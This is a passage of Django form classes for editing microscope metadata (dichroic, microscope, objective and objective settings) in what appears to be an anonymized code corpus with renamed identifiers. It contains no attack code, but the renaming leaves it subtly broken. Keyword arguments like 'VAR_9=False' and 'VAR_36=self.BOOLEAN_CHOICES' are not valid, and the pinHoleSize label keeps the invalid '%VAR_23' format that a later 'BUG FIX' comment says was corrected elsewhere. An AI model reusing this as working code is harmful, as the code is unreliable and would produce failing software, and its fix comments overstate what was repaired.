                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="ND filter (%)",
                required=False,
            )
            FUNC_1(self.fields["ndFilter"], VAR_9=False)
        # pinHoleSize (unit-carrying)
        try:
            if VAR_37 is not None and VAR_37.pinHoleSize is not None:
                self.fields["pinHoleSize"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    initial=VAR_37.pinHoleSize.getValue(),
                    label=("Pin hole size (%VAR_23)" % VAR_37.pinHoleSize.getSymbol()),
                    required=False,
                )
            else:
                self.fields["pinHoleSize"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    label="Pin hole size",
                    required=False,
                )
            FUNC_1(self.fields["pinHoleSize"], VAR_9=False)
        except Exception:
            self.fields["pinHoleSize"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Pin hole size",
                required=False,
            )
            FUNC_1(self.fields["pinHoleSize"], VAR_9=False)
        # fluor
        try:
            if VAR_37 is not None:
                self.fields["fluor"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    initial=VAR_37.fluor,
                    required=False,
                )
            else:
                self.fields["fluor"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["fluor"], VAR_9=False)
        except Exception:
            self.fields["fluor"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["fluor"], VAR_9=False)
        # illumination (choice field)
        try:
            if VAR_37.getIllumination() is not None:
                self.fields["illumination"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["illuminations"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_37.id, "illumination", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_37.getIllumination(),
                    required=False,
                )
            else:
                self.fields["illumination"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["illuminations"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_37.id, "illumination", VAR_7=True
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["illumination"], VAR_9=False)
        except Exception:
            self.fields["illumination"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["illumination"], VAR_9=False)
        # contrastMethod (choice field)
        try:
            if VAR_37.contrastMethod is not None:
                self.fields["contrastMethod"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["contrastMethods"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_37.id, "contrastMethod", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_37.getContrastMethod(),
                    label="Contrast method",
                    required=False,
                )
            else:
                self.fields["contrastMethod"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["contrastMethods"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_37.id, "contrastMethod", VAR_7=True
                            )
                        }
                    ),
                    label="Contrast method",
                    required=False,
                )
            FUNC_1(self.fields["contrastMethod"])
        except Exception:
            self.fields["contrastMethod"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Contrast method",
                required=False,
            )
            FUNC_1(self.fields["contrastMethod"])
        # mode (choice field)
        try:
            if VAR_37.getMode() is not None:
                self.fields["mode"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["modes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_37.id, "mode", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_37.getMode().value,
                    required=False,
                )
            else:
                self.fields["mode"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["modes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_37.id, "mode", VAR_7=True
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["mode"])
        except Exception:
            self.fields["mode"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["mode"])
        # pockelCellSetting
        try:
            if VAR_37.pockelCellSetting is not None:
                self.fields["pockelCellSetting"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    initial=VAR_37.pockelCellSetting,
                    label="Pockel cell",
                    required=False,
                )
            else:
                self.fields["pockelCellSetting"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    label="Pockel cell",
                    required=False,
                )
            FUNC_1(self.fields["pockelCellSetting"])
        except Exception:
            self.fields["pockelCellSetting"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Pockel cell",
                required=False,
            )
            FUNC_1(self.fields["pockelCellSetting"])
        # Fixed display order of the fields.
        self.fields.keyOrder = [
            "name",
            "excitationWave",
            "emissionWave",
            "ndFilter",
            "pinHoleSize",
            "fluor",
            "illumination",
            "contrastMethod",
            "mode",
            "pockelCellSetting",
        ]
class CLASS_13(forms.Form):
    """Form for editing Dichroic metadata (manufacturer, model, serial
    number, lot number).

    Every field is populated from ``kwargs["initial"]["dichroic"]``.  Each
    field is built inside try/except on purpose: if the dichroic is absent
    or any attribute lookup raises, the field degrades to a plain "N/A"
    CharField (the exception-driven fallback is the intended behavior).
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_13, self).__init__(*VAR_11, **VAR_12)

        # Manufacturer
        try:
            if VAR_12["initial"]["dichroic"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["dichroic"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["dichroic"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["dichroic"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["manufacturer"])

        # Model
        try:
            if VAR_12["initial"]["dichroic"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["dichroic"].id, "model"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["dichroic"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["dichroic"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["model"])

        # Serial number.
        # BUG FIX: the onchange handler was given the serialNumber *value*
        # as the object id; every other field here (and the sibling forms)
        # pass the dichroic id.
        try:
            if VAR_12["initial"]["dichroic"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["dichroic"].id,
                                "serialNumber",
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["dichroic"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["dichroic"].id,
                                "serialNumber",
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            FUNC_1(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            FUNC_1(self.fields["serialNumber"])

        # Lot number.
        # BUG FIX: as above, pass the dichroic id (not the lotNumber value)
        # to the onchange handler.
        try:
            if VAR_12["initial"]["dichroic"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["dichroic"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["dichroic"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["dichroic"].id, "lotNumber"
                            ),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            FUNC_1(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            FUNC_1(self.fields["lotNumber"])

        # Display order of the fields in the rendered form.
        self.fields.keyOrder = ["model", "manufacturer", "serialNumber", "lotNumber"]
class CLASS_14(forms.Form):
    """Form for editing Microscope metadata (model, manufacturer, serial
    number, lot number and microscope type).

    Fields are populated from ``kwargs["initial"]["microscope"]``; each
    field is built inside try/except so a missing microscope or failing
    attribute lookup degrades to an "N/A" CharField.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_14, self).__init__(*VAR_11, **VAR_12)

        # Model
        try:
            if VAR_12["initial"]["microscope"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["microscope"].id, "model"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["microscope"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["microscope"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["model"])

        # Manufacturer
        try:
            if VAR_12["initial"]["microscope"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["microscope"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["microscope"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["microscope"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["manufacturer"])

        # Serial number.
        # BUG FIX: the onchange handler previously saved this field under
        # "lotNumber" (copy-paste error); it must target "serialNumber".
        try:
            if VAR_12["initial"]["microscope"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["microscope"].id, "serialNumber"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["microscope"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["microscope"].id, "serialNumber"
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            FUNC_1(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            FUNC_1(self.fields["serialNumber"])

        # Lot number.
        # BUG FIX: the else/except branches were labelled "Serial number";
        # all branches now consistently use "Lot number".
        try:
            if VAR_12["initial"]["microscope"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["microscope"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["microscope"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["microscope"].id, "lotNumber"
                            ),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            FUNC_1(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            FUNC_1(self.fields["lotNumber"])

        # Microscope type: enumeration-backed dropdown.
        try:
            if VAR_12["initial"]["microscope"].getMicroscopeType() is not None:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["microscopeTypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["microscope"].id, "type", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_12["initial"]["microscope"].getMicroscopeType().value,
                    required=False,
                )
            else:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["microscopeTypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["microscope"].id, "type", VAR_7=True
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["type"])
        except Exception:
            self.fields["type"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["type"])

        # Display order of the fields in the rendered form.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "type",
        ]
class CLASS_15(forms.Form):
    """Form for editing Objective metadata.

    Fields are populated from ``kwargs["initial"]["objective"]`` plus the
    enumeration querysets (``"immersions"``, ``"corrections"``).  Each
    field is built inside try/except so a missing objective or failing
    attribute lookup degrades to an "N/A" CharField.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_15, self).__init__(*VAR_11, **VAR_12)

        # Model
        try:
            if VAR_12["initial"]["objective"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "model"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["model"])

        # Manufacturer
        try:
            if VAR_12["initial"]["objective"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["manufacturer"])

        # Serial number
        try:
            if VAR_12["initial"]["objective"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "serialNumber"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "serialNumber"
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            FUNC_1(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            FUNC_1(self.fields["serialNumber"])

        # Lot number.
        # BUG FIX: the onchange handler was given the lotNumber *value* as
        # the object id (and, in the no-value branch, an unrelated
        # kwargs["initial"]["logicalchannel"] lookup that made the field
        # always fall through to "N/A"); every other field passes the
        # objective id.
        try:
            if VAR_12["initial"]["objective"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "lotNumber"
                            ),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            FUNC_1(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            FUNC_1(self.fields["lotNumber"])

        # Nominal magnification
        try:
            if VAR_12["initial"]["objective"].nominalMagnification is not None:
                self.fields["nominalMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "nominalMagnification",
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].nominalMagnification,
                    label="Nominal magnification",
                    required=False,
                )
            else:
                self.fields["nominalMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "nominalMagnification",
                            ),
                        }
                    ),
                    label="Nominal magnification",
                    required=False,
                )
            FUNC_1(self.fields["nominalMagnification"])
        except Exception:
            self.fields["nominalMagnification"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Nominal magnification",
                required=False,
            )
            FUNC_1(self.fields["nominalMagnification"])

        # Calibrated magnification
        try:
            if VAR_12["initial"]["objective"].calibratedMagnification is not None:
                self.fields["calibratedMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "calibratedMagnification",
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].calibratedMagnification,
                    label="Calibrated magnification",
                    required=False,
                )
            else:
                self.fields["calibratedMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "calibratedMagnification",
                            ),
                        }
                    ),
                    label="Calibrated magnification",
                    required=False,
                )
            FUNC_1(self.fields["calibratedMagnification"])
        except Exception:
            self.fields["calibratedMagnification"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Calibrated magnification",
                required=False,
            )
            FUNC_1(self.fields["calibratedMagnification"])

        # Lens NA.
        # CONSISTENCY FIX: the no-value branch now also labels the field
        # "Lens NA", matching the other two branches.
        try:
            if VAR_12["initial"]["objective"].lensNA is not None:
                self.fields["lensNA"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "lensNA"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].lensNA,
                    label="Lens NA",
                    required=False,
                )
            else:
                self.fields["lensNA"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "lensNA"
                            ),
                        }
                    ),
                    label="Lens NA",
                    required=False,
                )
            FUNC_1(self.fields["lensNA"])
        except Exception:
            self.fields["lensNA"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lens NA",
                required=False,
            )
            FUNC_1(self.fields["lensNA"])

        # Immersion: enumeration-backed dropdown.
        try:
            if VAR_12["initial"]["objective"].getImmersion() is not None:
                self.fields["immersion"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["immersions"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "immersion",
                                VAR_7=True,
                            )
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].getImmersion().value,
                    required=False,
                )
            else:
                self.fields["immersion"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["immersions"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "immersion",
                                VAR_7=True,
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["immersion"])
        except Exception:
            self.fields["immersion"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["immersion"])

        # Correction: enumeration-backed dropdown.
        try:
            if VAR_12["initial"]["objective"].getCorrection() is not None:
                self.fields["correction"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["corrections"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "correction",
                                VAR_7=True,
                            )
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].getCorrection().value,
                    required=False,
                )
            else:
                self.fields["correction"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["corrections"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "correction",
                                VAR_7=True,
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["correction"])
        except Exception:
            self.fields["correction"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["correction"])

        # Working distance.
        # BUG FIX: the label used "%VAR_23", which is not a valid
        # %-conversion and raised at format time (always forcing the "N/A"
        # fallback); "%s" is the intended conversion for the unit symbol.
        try:
            if VAR_12["initial"]["objective"].workingDistance is not None:
                self.fields["workingDistance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "workingDistance"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].workingDistance.getValue(),
                    label=(
                        "Working distance (%s)"
                        % VAR_12["initial"]["objective"].workingDistance.getSymbol()
                    ),
                    required=False,
                )
            else:
                self.fields["workingDistance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "workingDistance"
                            ),
                        }
                    ),
                    label="Working distance",
                    required=False,
                )
            FUNC_1(self.fields["workingDistance"])
        except Exception:
            self.fields["workingDistance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Working distance",
                required=False,
            )
            FUNC_1(self.fields["workingDistance"])

        # Iris: boolean dropdown.
        # NOTE(review): self.BOOLEAN_CHOICES is expected to be supplied by
        # a subclass (cf. the VAR_24 tuple on the subclass below); when it
        # is absent the except branch yields the "N/A" fallback — confirm
        # this is intended for direct instantiation of this class.
        try:
            if VAR_12["initial"]["objective"].getIris() is not None:
                self.fields["iris"] = forms.ChoiceField(
                    VAR_36=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "iris", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].getIris().value,
                    required=False,
                )
            else:
                self.fields["iris"] = forms.ChoiceField(
                    VAR_36=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "iris", VAR_7=True
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["iris"])
        except Exception:
            self.fields["iris"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["iris"])

        # Display order of the fields in the rendered form.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "nominalMagnification",
            "calibratedMagnification",
            "lensNA",
            "immersion",
            "correction",
            "workingDistance",
            "iris",
        ]
class CLASS_16(CLASS_15):
    """Objective-settings form.

    Extends the objective form (CLASS_15) with the settings-level fields:
    correction collar, medium and refractive index, all read from
    ``kwargs["initial"]["objectiveSettings"]``.
    """

    # Choices for boolean-valued dropdowns; "" renders as "unset".
    VAR_24 = (
        ("", "---------"),
        ("True", "True"),
        ("False", "False"),
    )

    def __init__(self, *VAR_11, **VAR_12):
        # Build the inherited objective fields first; the keyOrder below
        # then re-lists them ahead of the settings fields.
        super(CLASS_16, self).__init__(*VAR_11, **VAR_12)
        # Correction collar: free-text field.  The whole lookup is inside
        # try/except on purpose — a missing "objectiveSettings" entry or a
        # failing attribute access degrades to a read-only "N/A" field.
        try:
            if VAR_12["initial"]["objectiveSettings"].correctionCollar is not None:
                self.fields["correctionCollar"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
                                "correctionCollar",
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objectiveSettings"].correctionCollar,
                    label="Correction collar",
                    required=False,
                )
            else:
                # No stored value: same field, just no initial.
                self.fields["correctionCollar"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
                                "correctionCollar",
                            ),
                        }
                    ),
                    label="Correction collar",
                    required=False,
                )
            FUNC_1(self.fields["correctionCollar"])
        except Exception:
            # Fallback: plain non-editable-style "N/A" field.
            self.fields["correctionCollar"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Correction collar",
                required=False,
            )
            FUNC_1(self.fields["correctionCollar"])
        # Medium: enumeration-backed dropdown over the "mediums" queryset.
        try:
            if VAR_12["initial"]["objectiveSettings"].getMedium() is not None:
                self.fields["medium"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
                                "medium",
                                VAR_7=True,
                            )
                        }
                    ),
                    initial=VAR_12["initial"]["objectiveSettings"].getMedium().value,
                    required=False,
                )
            else:
                self.fields["medium"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["mediums"],
                    empty_label="Not set",
